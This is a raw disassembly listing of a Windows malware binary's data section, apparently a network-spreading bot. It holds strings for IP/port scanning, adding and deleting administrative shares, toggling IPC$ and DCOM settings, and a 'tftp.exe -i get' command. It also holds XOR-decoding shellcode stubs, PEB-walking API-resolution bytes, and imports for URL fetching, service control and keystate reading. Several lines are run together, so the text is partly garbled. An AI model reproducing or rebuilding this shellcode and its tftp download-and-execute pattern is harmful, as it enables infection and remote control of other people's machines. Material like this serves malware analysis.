aScanningIpSPor db ' Scanning IP: %s, Port: %d.',0
align 10h
dd 1D4C0h
align 8
off_43AEC8 dd offset dword_43AF00 ; DATA XREF: sub_416561+1B3�o
; sub_416885+17A�o
align 10h
dd offset dword_43AEF8
align 8
off_43AED8 dd offset dword_43AEF4 ; DATA XREF: sub_416885+1E3�o
dd offset off_43AEF0
dd offset dword_43AEEC
dd offset off_43AEE8
off_43AEE8 dd offset dword_5C3A44 ; DATA XREF: sub_416561+217�o
; ___:0043AEE4�o
dword_43AEEC dd 2444h off_43AEF0 dd offset byte_5C3A43 ; DATA XREF: ___:0043AEDC�o
dword_43AEF4 dd 2443h dword_43AEF8 dd 494D4441h, 244Ehdword_43AF00 dd 24435049h, 0 unk_43AF08 db 2 ; DATA XREF: sub_416561+2E5�o
; sub_416885+2D8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetapi32_dllCo db ' Netapi32.dll couldn',27h,'t be loaded.',0
align 4
unk_43AF48 db 2 ; DATA XREF: sub_416561+2CF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetworkSharesD db ' Network shares deleted.',0
align 10h
unk_43AF80 db 2 ; DATA XREF: sub_416561:loc_4167C3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToDelete db ' Failed to delete ',27h,'%S',27h,' share.',0
align 4
unk_43AFBC db 2 ; DATA XREF: sub_416561+25B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSDeleted_ db ' Share ',27h,'%S',27h,' deleted.',0
align 10h
unk_43AFF0 db 2 ; DATA XREF: sub_416561:loc_416730�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToDele_0 db ' Failed to delete ',27h,'%s',27h,' share.',0
align 4
unk_43B02C db 2 ; DATA XREF: sub_416561+1C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSDelete_0 db ' Share ',27h,'%s',27h,' deleted.',0
align 10h
unk_43B060 db 2 ; DATA XREF: sub_416561:loc_416693�o
; sub_416885:loc_4169B3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAdvapi32_dllCo db ' Advapi32.dll couldn',27h,'t be loaded.',0
align 10h
unk_43B0A0 db 2 ; DATA XREF: sub_416561:loc_41668C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpenIp db ' Failed to open IPC$ Restriction registry key.',0
align 4
unk_43B0EC db 2 ; DATA XREF: sub_416561:loc_41666E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aRestrictedAcce db ' Restricted access to the IPC$ Share.',0
align 10h
unk_43B130 db 2 ; DATA XREF: sub_416561+106�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToRestri db ' Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_416561+ED�o
; sub_416885+ED�o
align 10h
unk_43B190 db 2 ; DATA XREF: sub_416561+91�o
; sub_416885+91�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpenDc db ' Failed to open DCOM registry key.',0
align 10h
dword_43B1D0 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_416561:loc_4165CE�o
dd 2202967h, 2002BBBBh, 4F434420h, 6964204Dh, 6C626173h
dd 2E6465h
unk_43B1FC db 2 ; DATA XREF: sub_416561+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aDisableDcomFai db ' Disable DCOM failed.',0
align 10h
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_416561+54�o
; sub_416885+54�o
align 4
word_43B23C dw 4Eh ; DATA XREF: sub_416561+38�r
align 10h
unk_43B240 db 2 ; DATA XREF: sub_416885+2C0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetworkSharesA db ' Network shares added.',0
align 4
aC_1 db '%c:\',0 ; DATA XREF: sub_416885+22A�o
align 4
aC_2 db '%c$',0 ; DATA XREF: sub_416885+219�o
unk_43B280 db 2 ; DATA XREF: sub_416885:loc_416A24�o
; sub_416885:loc_416AF2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToAddSSh db ' Failed to add ',27h,'%s',27h,' share.',0
align 4
unk_43B2B8 db 2 ; DATA XREF: sub_416885+198�o
; sub_416885+266�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSAdded_ db ' Share ',27h,'%s',27h,' added.',0
align 4
unk_43B2E8 db 2 ; DATA XREF: sub_416885:loc_4169AC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpen_0 db ' Failed to open IPC$ restriction registry key.',0
align 4
unk_43B334 db 2 ; DATA XREF: sub_416885:loc_41698E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aUnrestrictedAc db ' Unrestricted access to the IPC$ Share.',0
unk_43B378 db 2 ; DATA XREF: sub_416885+102�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToUnrest db ' Failed to unrestrict access to the IPC$ Share.',0
dword_43B3C4 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_416885:loc_4168F2�o
dd 2202967h, 2002BBBBh, 4F434420h, 6E65204Dh, 656C6261h
dd 2E64h
unk_43B3F0 db 2 ; DATA XREF: sub_416885+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aEnableDcomFail db ' Enable DCOM failed.',0
align 4
word_43B424 dw 59h ; DATA XREF: sub_416885+38�r
align 4
loc_43B428: ; DATA XREF: sub_416D51+C4�o
jmp short loc_43B42C
; ---------------------------------------------------------------------------
loc_43B42A: ; CODE XREF: ___:loc_43B42C�p
jmp short loc_43B431
; ---------------------------------------------------------------------------
loc_43B42C: ; CODE XREF: ___:loc_43B428�j
call loc_43B42A
loc_43B431: ; CODE XREF: ___:loc_43B42A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_43B436 dw 0FFFFh ; DATA XREF: sub_416D51+CC�w
db 80h, 73h, 0Eh
byte_43B43B db 0FFh ; DATA XREF: sub_416D51+D3�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_43B440: ; DATA XREF: sub_416D51+A2�o
jmp short loc_43B444
; ---------------------------------------------------------------------------
loc_43B442: ; CODE XREF: ___:loc_43B444�p
jmp short loc_43B449
; ---------------------------------------------------------------------------
loc_43B444: ; CODE XREF: ___:loc_43B440�j
call loc_43B442
loc_43B449: ; CODE XREF: ___:loc_43B442�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_43B44D db 0FFh ; DATA XREF: sub_416D51+AA�w
dw 7380h
db 0Ch
byte_43B451 db 0FFh ; DATA XREF: sub_416D51+B0�w
dw 0E243h
dd 0F9h
dword_43B458 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_416BDA+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_43B4BC dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_416BDA+79�o
aJ db 'j',0
db 0E8h
dword_43B4D5 dd 17h ; ---------------------------------------------------------------------------
jnz short near ptr byte_43B4DC
retn
; ---------------------------------------------------------------------------
byte_43B4DC db 0E8h ; CODE XREF: ___:0043B4D9�j
dword_43B4DD dd 1 byte_43B4E1 db 0, 6Ah, 0 ; DATA XREF: sub_416BDA+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_43B4EB dd 0FFFFFFEDh ; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 4
aThreadList db '-[Thread List]-',0
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_4170E6+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_4170E6+35�o
dword_43B56C dd 29E2C0h dd 9875h, 9873h
off_43B578 dd offset sub_418D5F ; DATA XREF: ___:00418F6A�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
off_43B590 dd offset sub_418FA8 ; DATA XREF: sub_4191E5+1C�r
dword_43B594 dd 2 ; sub_41D415+46�r ...
off_43B598 dd offset aNull_0 ; DATA XREF: sub_419343:loc_4196A7�r
; sub_419343+457�r
; "(null)"
off_43B59C dd offset aNull ; DATA XREF: sub_419343+259�r
; "(null)"
off_43B5A0 dd offset word_43B5AA ; DATA XREF: sub_417894+23�r
; sub_417894:loc_4178F5�r ...
off_43B5A4 dd offset word_43B5AA ; DATA XREF: sub_420833+18�r
db 2 dup(0)
word_43B5AA dw 20h ; DATA XREF: sub_41EE2C+18�r
; ___:off_43B5A0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_43B7AC dd 1 ; sub_417894:loc_4178E0�r ...
byte_43B7B0 db 2Eh ; DATA XREF: sub_41A824:loc_41AB18�r
; sub_41A824+311�r ...
align 4
dd 1, 10h
dword_43B7BC dd 3F8h ; sub_418C3F+4D�r ...
dword_43B7C0 dd 0D2D0920h, 5Dhdword_43B7C8 dd 5Dh, 0 byte_43B7D0 db 1 ; DATA XREF: sub_41BFFC+E1�r
db 2, 4, 8
align 8
dword_43B7D8 dd 3A4h dword_43B7DC dd 82798260h, 21h, 0dword_43B7E8 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
off_43B8C8 dd offset sub_41C8A4 ; DATA XREF: sub_418D77+F�w
; sub_419343+3AA�r ...
off_43B8CC dd offset sub_41C539 ; DATA XREF: sub_418D77+5�w
; sub_419343+3E2�r
off_43B8D0 dd offset sub_41C59F ; DATA XREF: sub_418D77+14�w
; sub_41A824+430�r
off_43B8D4 dd offset sub_41C4DF ; DATA XREF: sub_418D77+1E�w
; sub_419343+3CB�r
off_43B8D8 dd offset sub_41C587 ; DATA XREF: sub_418D77+28�w
off_43B8DC dd offset sub_41C8A4 ; DATA XREF: sub_418D77+32�w
dword_43B8E0 dd 1 dword_43B8E4 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_43BA48 dd 0C0000005h ; sub_41CB8C+A�r ...
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_43BAC0 dd 3 dword_43BAC4 dd 7 dword_43BAC8 dd 0Ah dword_43BACC dd 8Ch ; ___:0041CADA�w ...
dword_43BAD0 dd 0FFFFFFFFh, 0A00h ; sub_41B582:loc_41B603�o
dword_43BAD8 dd 19930520h, 3 dup(0) ; sub_41D2E2+2�o
dword_43BAE8 dd 2 ; sub_41D415+28�r
off_43BAEC dd offset aR6002FloatingP ; DATA XREF: sub_41D415+FC�r
; sub_41D415+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 421944h, 9, 421918h, 0Ah, 4218F4h, 10h, 4218C8h
dd 11h, 421898h, 12h, 421874h, 13h, 421848h, 18h, 421810h
dd 19h, 4217E8h, 1Ah, 4217B0h, 1Bh, 421778h, 1Ch, 421750h
dd 78h, 421740h, 79h, 421730h, 7Ah, 421720h, 0FCh, 4282FCh
dd 0FFh, 421710h
off_43BB78 dd offset dword_515B60 ; DATA XREF: sub_41D415+1B�o
; sub_41D5D2+55�o
align 10h
dd offset dword_515B60
dd 101h
dword_43BB88 dd 0FFFFFFFFh, 0 dd 1000h, 0
dword_43BB98 dd 3 dup(0) ; sub_41C981+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_43BBB8 dd 3 dup(0) ; sub_41C981:loc_41C99F�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_43BBE8 dd 84h dup(0) dword_43BDF8 dd 2 dup(0) dword_43BE00 dd 7080h ; sub_41DD12+5E�w ...
dword_43BE04 dd 1 ; sub_41DD12+8B�w ...
dword_43BE08 dd 0FFFFF1F0h ; sub_41DD12+94�w ...
off_43BE0C dd offset dword_545350 ; DATA XREF: ___:off_43BE8C�o
dd 0Fh dup(0)
off_43BE4C dd offset dword_544450 ; DATA XREF: ___:off_43BE90�o
dd 0Fh dup(0)
off_43BE8C dd offset off_43BE0C ; DATA XREF: sub_41DD12+BA�r
; sub_41DD12+D9�r ...
off_43BE90 dd offset off_43BE4C ; DATA XREF: sub_41DD12+F4�r
; sub_41DD12+11B�r ...
align 8
dword_43BE98 dd 0FFFFFFFFh ; sub_41DF70+1E�r ...
dword_43BE9C dd 0 ; sub_41E11C+BF�w
dword_43BEA0 dd 0 ; sub_41E11C+E0�w
align 8
dword_43BEA8 dd 0FFFFFFFFh ; sub_41DF70+26�r ...
dword_43BEAC dd 0 ; sub_41E11C+EA�w ...
dword_43BEB0 dd 0 ; sub_41E11C+23�r ...
dword_43BEB4 dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_43BEE4 dd 16Dh ; sub_41E11C+2E�r ...
dword_43BEE8 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_43BF20 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_43BF38 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fhdword_43BF50 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_43C0B0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_41FDC6+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
byte_43C210 db 0 ; DATA XREF: sub_401447+1D3�w
; sub_401447+2D2�o
align 2
word_43C212 dw 0 ; DATA XREF: sub_401447+1E3�w
word_43C214 dw 0 ; DATA XREF: sub_401447+1E9�w
word_43C216 dw 0 ; DATA XREF: sub_401447+1F0�w
byte_43C218 db 0 ; DATA XREF: sub_401447+1F7�w
byte_43C219 db 0 ; DATA XREF: sub_401447+1FE�w
word_43C21A dw 0 ; DATA XREF: sub_401447+204�w
dword_43C21C dd 0 ; sub_401447+250�w
dword_43C220 dd 0 byte_43C224 db 0 ; DATA XREF: sub_401447+26A�w
byte_43C225 db 0 ; DATA XREF: sub_401447+27D�w
word_43C226 dw 0 ; DATA XREF: sub_401447+295�w
word_43C228 dw 0 ; DATA XREF: sub_401447+2A4�w
word_43C22A dw 0 ; DATA XREF: sub_401447+29C�w
dword_43C22C dd 101h dup(0) dword_43C630 dd 0 ; sub_402B83+9�o
align 8
dword_43C638 dd 0 byte_43C63C db 0 ; DATA XREF: sub_403A47+36�r
; sub_403B2A+37�r ...
align 10h
dword_43C640 dd 0 ; sub_404197+30�r ...
align 8
dword_43C648 dd 0 ; sub_405953+51�r ...
dword_43C64C dd 0 ; sub_404969+14C�r ...
dd 2 dup(0)
dword_43C658 dd 0 ; sub_407599+92�w ...
dword_43C65C dd 0 ; sub_4078E6+D9�w ...
dd 0BB6h dup(0)
dword_43F538 dd 6 dup(0) ; sub_4076D2+138�o ...
dword_43F550 dd 0 ; sub_4071BD+102�o
dword_43F554 dd 41h dup(0) dword_43F658 dd 41h dup(0) dword_43F75C dd 0 ; sub_4071BD+114�r
dword_43F760 dd 0 dword_43F764 dd 0 ; sub_4071BD+CF�r
dword_43F768 dd 20h dup(0) ; sub_4071BD+BA�o
dword_43F7E8 dd 0 dword_43F7EC dd 0 ; sub_4071BD+C7�w
dword_43F7F0 dd 0 align 8
dword_43F7F8 dd 0 ; sub_4071BD+32E�o
dword_43F7FC dd 0A2h dup(0) dword_43FA84 dd 41h dup(0) dword_43FB88 dd 0 ; sub_4071BD+2E1�r
align 10h
dword_43FB90 dd 0 ; sub_4071BD+340�r
dword_43FB94 dd 0 dword_43FB98 dd 0 dword_43FB9C dd 0 dd 0
dword_43FBA4 dd 0 dword_43FBA8 dd 0 ; sub_4071BD+221�o
dword_43FBAC dd 41h dup(0) dword_43FCB0 dd 41h dup(0) dword_43FDB4 dd 0 ; sub_4071BD+233�r
dword_43FDB8 dd 0 dword_43FDBC dd 0 dword_43FDC0 dd 20h dup(0) ; sub_4071BD+1D9�o
dword_43FE40 dd 0 dword_43FE44 dd 0 ; sub_4071BD+1E6�w
dword_43FE48 dd 0 align 10h
dword_43FE50 dd 0 ; sub_40894E+12�r
align 8
dword_43FE58 dd 80h dup(0) dword_440058 dd 200h dup(0) ; sub_409307+DD�o ...
dword_440858 dd 200h dup(0) ; sub_409307+F4�o ...
dword_441058 dd 0 ; resolved to->NTDLL.RtlCreateQueryDebugBuffer ; sub_40917E+94�r
dword_44105C dd 0 ; resolved to->NTDLL.RtlRunDecodeUnicodeString ; sub_4095E4+55�r ...
dword_441060 dd 0 ; resolved to->NTDLL.RtlDestroyQueryDebugBuffer ; sub_40917E+D6�r ...
dword_441064 dd 0 ; resolved to->NTDLL.ZwQuerySystemInformation ; sub_40917E+35�r ...
dword_441068 dd 80h dup(0) dword_441268 dd 0 ; resolved to->NTDLL.RtlQueryProcessDebugInformation ; sub_40917E+A2�r
align 10h
dword_441270 dd 0 ; sub_408FAC+103�r ...
dword_441274 dd 0 ; sub_4094AE+107�w
dword_441278 dd 0 ; sub_4094AE+10D�w ...
dword_44127C dd 0 ; sub_4095E4+4F�r
dword_441280 dd 0 ; resolved to->GDI32.DeleteDC ; sub_40851A+21A�r ...
dword_441284 dd 0 ; resolved to->KERNEL32.Module32First ; sub_415B93+166�r
dword_441288 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_409794+862�r ...
dword_44128C dd 0 ; sub_409794+A18�r ...
dword_441290 dd 0 ; sub_409794+9E8�r ...
dword_441294 dd 0 ; resolved to->GDI32.SelectObject ; sub_409794+46F�w ...
dword_441298 dd 0 ; resolved to->USER32.GetKeyState ; sub_402368+2A4�r ...
dword_44129C dd 0 ; sub_409794+A10�r ...
dword_4412A0 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_409794+3A9�r ...
dword_4412A4 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_40BDAD+11E�r
dword_4412A8 dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_409794+3B1�r ...
dword_4412AC dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_40E284+AD�r
dword_4412B0 dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_40841A+7D�r ...
dword_4412B4 dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_409794+D2�r ...
dword_4412B8 dd 0 ; sub_409794+9DB�r ...
dword_4412BC dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_409794+3C9�r ...
dword_4412C0 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_409794+88E�r ...
dword_4412C4 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_409794+2A5�w ...
dword_4412C8 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_409794+886�r ...
dword_4412CC dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequencydword_4412D0 dd 0 ; resolved to->WININET.InternetReadFile ; sub_409794+896�r ...
dword_4412D4 dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_409794+52F�w ...
dword_4412D8 dd 0 ; resolved to->KERNEL32.Process32Next ; sub_409794+CA�r ...
dword_4412DC dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_40B45B+11A�r
